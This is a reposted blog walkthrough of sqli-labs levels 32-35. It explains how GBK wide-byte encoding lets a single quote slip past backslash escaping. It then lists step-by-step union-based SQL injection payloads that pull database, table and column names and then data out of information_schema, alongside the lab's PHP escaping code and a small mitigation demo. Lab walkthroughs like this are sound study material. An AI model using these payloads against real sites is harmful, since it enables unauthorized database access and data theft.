
SQL Lab (32~35) contains the principle understanding and precautions of wide byte injection (continuously updated later)

2022-07-07 12:24:00 hcjtn

(32~35) Principle and precautions of wide byte injection

sql-lab-32

Let's start with level 32. Pass a parameter and we find:

1\'and 1=2 

Here the backslash \ means "escape": it turns the single quote after it into plain string content, so that quote no longer has a closing effect; it is just content. In other words, this single quote can no longer pair with the quotes before and after it, so the input that follows is not executed as code.

So we have two approaches:

  1. Make the \ useless
  2. Make the \ disappear

For idea 1, we can try to escape the \ itself so that it loses its escaping effect.

Wide byte injection develops idea 2.

  1. When a character occupies one byte, it is called a narrow byte character.
  2. When a character occupies two bytes, it is called a wide byte character.
  3. By default, English characters take one byte and Chinese characters take two bytes.
  4. Common wide byte encodings: GB2312, GBK, GB18030, BIG5, Shift_JIS, etc.

Wide byte injection occurs when:

  1. The client, the connection layer and the result set all use GBK encoding.
  2. iconv is used for charset conversion from UTF-8 to GBK, while set names also sets the charset to GBK. Submitting %e9%8c%a6 is then enough.
  3. set names utf8 specifies the UTF-8 charset and the escape function is also used. Sometimes, to avoid garbled text, the submitted GBK characters are first converted to UTF-8 with iconv (or mb_convert_encoding) and then spliced into the SQL statement.

**Summary:** wide byte injection is possible as long as wide bytes are present.

The encoding of this page is inconsistent with that of the database, so a conversion function such as iconv is used to convert the charset, and that is exactly where the problem lies in this level.

For example:

When we use URL encoding, the PHP code receives %df%27. When the user submits the URL-encoded %df%27, PHP reads it, finds that %27 is a single quote, and prefixes it with the escape character \, so it becomes %df%5c%27, where %5c is the URL-encoded form of \. The problem arises here: when the PHP code sends the query to the database, a GBK conversion happens, and in the GBK code table %df%5c is a brand-new Chinese character, so the single quote escapes from its backslash and is live again.

As mentioned before, when a byte's code is above 128, two bytes can be combined into one Chinese character.

In the above example there is actually more than one injection form: any byte that forms a brand-new Chinese character in the final GBK encoding works. (But everyone online uses this same example, so let's keep the tradition. Hey.)
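The following added example (not from the original post or from sqli-labs) reproduces the byte sequence above in Python: a byte-wise addslashes() is applied to the constructed %df' input, and the result is decoded the way a GBK connection would read it, so the quote that addslashes() thought it had escaped reappears, while under UTF-8 it stays escaped. The charset-aware variant at the end is the defensive alternative the note later in the post hints at (escape in the same charset the connection uses); function names and the sample input are assumptions.

```python
# Added example, not from the original post or sqli-labs. Simulates a
# byte-wise addslashes() followed by a GBK connection. Names are assumed.
from typing import Optional

# ' " \ NUL: the characters addslashes() prefixes with a backslash
ESCAPED = {0x27, 0x22, 0x5C, 0x00}


def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP addslashes(); it never looks at the charset."""
    out = bytearray()
    for b in data:
        if b in ESCAPED:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Decode the escaped bytes the way MySQL would under the given connection
    charset and count single quotes that are not preceded by a backslash,
    i.e. quotes that can still terminate a string literal."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":      # a backslash escapes the next character
            i += 2
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


def charset_aware_escape(data: bytes, charset: str) -> Optional[bytes]:
    """Mitigation: decode strictly in the connection charset first, escape per
    character, then re-encode. A lone lead byte in front of a quote is not a
    valid GBK sequence, so such input is rejected instead of escaped blindly."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError:
        return None
    escaped = "".join("\\" + ch if ord(ch) in ESCAPED else ch for ch in text)
    return escaped.encode(charset)


# Constructed sample input: the URL-decoded %df' payload discussed above.
PAYLOAD = bytes.fromhex("df27") + b" and 1=1 -- q"

if __name__ == "__main__":
    for cs in ("gbk", "utf-8"):
        print(cs, unescaped_quotes(addslashes(PAYLOAD), cs))   # gbk -> 1, utf-8 -> 0
    print(charset_aware_escape(PAYLOAD, "gbk"))              # None: rejected
```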

Summarize the practice of this topic :

Determine whether there is injection: ?id=1 %df' and 1=1 -- q
?id=1 %df' and 1=2 -- q

Determine the number of fields: ?id=1 %df' order by 3 -- q

Determine the display positions: ?id=-1 %df' union select 1,2,3 -- q

Find the database name: ?id=-1 %df' union select 1,database(),3 -- q

Find the table names: ?id=-1 %df' union select 1,table_name,3 from information_schema.tables where table_schema=database() -- q

Find the column names: ?id=-1 %df' union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name=0x656d61696c73-- q

  • Here we convert emails to hex, thus avoiding the use of single quotes.

MySQL statements can recognize hexadecimal encoding.

  • Note:
    • %df' cannot be used here, because after GBK encoding our SQL statement would turn into Yun'emails Yun' (Yun standing for the Chinese character formed), so the injection fails.

Read the data: ?id=-1 %df' union select 1,id,3 from emails-- q

Meanwhile, let's look at the PHP source code of level 32:

function check_addslashes($string)
{
    
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
      
    
    return $string;
}

There is a new function we haven't seen before:

    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);

The preg_quote function escapes regular expression special characters.

The special characters of regular expressions are: . \ + * ? [ ^ ] $ ( ) { } = ! < > | : -

Summary of common encodings:

  • ASCII encodes only English symbols and letters; GB2312 encodes English symbols, English letters and Chinese characters; UTF-8 encodes all the languages in the world. Therefore the GB2312 character set contains the ASCII characters, and UTF-8 contains the GB2312 characters.

Differences and comparison between GBK and UTF-8

  • GBK text encoding is represented by double bytes; UTF-8 is a multi-byte encoding for international characters.

  • GBK contains all Chinese characters; UTF-8 contains the characters needed by all countries in the world.

  • GBK is an expansion of the national standard GB2312 that stays compatible with GB2312 (it does not seem to be a national standard yet).

  • Text in UTF-8 encoding can be displayed in the browsers of all countries that support the UTF-8 character set.

    • For example, with UTF-8 encoding, a foreigner's English IE can also show Chinese without downloading the IE Chinese language support pack. So for a forum with more English, each character takes 2 bytes under GBK, whereas under UTF-8 English takes only one byte.
  • UTF-8 is an international encoding with good universality, so foreigners can also browse the forum; GBK is a national encoding whose universality is worse than UTF-8, but the database space UTF-8 occupies is bigger than GBK.

    Reprinted source:

    Choosing the encoding for a database (GBK, UTF-8) - JarryLiu's column - CSDN Blog - database encoding format

Notes:

  1. Times are changing; UTF-8 is the general trend, and UTF-8 also avoids many byte-related problems.

  2. Use iconv with caution when converting string encodings; garbled text appears easily (and wide byte injection cannot be avoided). As long as we set the front-end HTML/JS/CSS encoding to GBK and the MySQL/PHP encoding to GBK, there will be no garbling, and there is no need to call iconv for transcoding and cause unnecessary trouble.

  3. Be careful with wide byte encodings!!!

sql-lab-33

The approach for level 33 is exactly the same as for level 32:

Determine the number of fields: ?id=1 %df' order by 3 -- q

Determine the display positions: ?id=-1 %df' union select 1,2,3 -- q

Find the database name: ?id=-1 %df' union select 1,database(),3 -- q

Find the table names: ?id=-1 %df' union select 1,table_name,3 from information_schema.tables where table_schema=database() -- q

Find the column names: ?id=-1 %df' union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name=0x656d61696c73-- q

Read the data: ?id=-1 %df' union select 1,id,3 from emails-- q

Looking at the source code, we find that the only difference is in the filter function of the PHP code:

Level 32 writes the escaping by hand, while level 33 uses a PHP function to filter:

function check_addslashes($string)
{
    // level 33 delegates the escaping to PHP's built-in addslashes()
    $string = addslashes($string);
    return $string;
}

addslashes() returns a string with a backslash added before each of the predefined characters.

The predefined characters are:

  • Single quote (')
  • Double quote (")
  • Backslash (\)
  • NUL

sql-lab-34

In level 34 we see the familiar backslash.

So let's try the wide byte injection mentioned in level 32, combining %df with '.

We find:

%df combined with \ is encoded by GBK as a Chinese character.

Compared with level 32, where we injected directly in the URL bar, in level 34 we inject in the input box. We find that %df entered in the URL bar is input in hexadecimal form, whereas %df entered in the input box is input as a plain string.

URL encoding is the hexadecimal of a character's ASCII code, with one change: a % is prepended. For example, \ has ASCII code 92, 92 in hexadecimal is 5c, so the URL encoding of \ is %5c.

So in this level we can:

  1. Use Burp Suite
  2. Use Chinese characters to bypass

First, the first method:

Input a'or 1=2 -- q,

Capture the packet and, in the hex tab, change the hex of a to df (essentially, use any character, and in the hex tab write df before the single quote so that it combines with \ to form a new Chinese character).

Note: here df is a character written in hexadecimal.


Then forward the packet.


The second method

Its nature is similar to %df: some Chinese characters are encoded as three bytes. Split the three bytes, take the first two as a group, and let the last one combine with \ to be encoded as a two-byte character, so the single quote escapes from its backslash.

So we can :

Determine the number of fields: han' or 1=1 order by 3 -- q

Determine the display positions: han' union select 1,2 -- q

Find the database name: han' union select 1,database()-- q

Find the table names: han' union select 1,table_name from information_schema.tables where table_schema=database() -- q

Find the column names: han' union select 1,column_name from information_schema.columns where table_schema=database() and table_name=0x656d61696c73-- q

Read the data: han' union select 1,id from emails-- q

sql-lab-35

Following the ideas of the previous levels, we try to close the quote and find, sure enough, that ' is commented out. Then we try %df, using the Burp Suite hex tab or Chinese characters to bypass, but we find that it is useless.


In fact, this level gave us a hint at the beginning:


It says: why should we care about the addslashes() function? In other words, the PHP function is useless here.

To put it another way, there may be no quoting to close here.

Let's try, and we find that this is indeed the case.


Determine whether there is an injection point: ?id=1 and 1=1-- q

Determine the number of fields: ?id=1 order by 3-- q

Determine the display positions: ?id=-1 union select 1,2,3-- q

Find the database name: ?id=-1 union select 1,2,database() -- q

Find the table names: ?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- q

?id=-1 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1-- q

Find the column names: ?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x656d61696c73 -- q

?id=-1 union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name=0x656d61696c73 limit 0,1-- q

Note: when # is used as the comment, limit 0,1 does not work.

Because in the browser URL bar # is an anchor, it is not sent to the back end during the request.

Read the data: ?id=-1 union select 1,id,3 from emails -- q

Original site

Copyright notice
This article was written by [hcjtn]; please include the original link when reposting, thanks
https://yzsam.com/2022/02/202202130618271532.html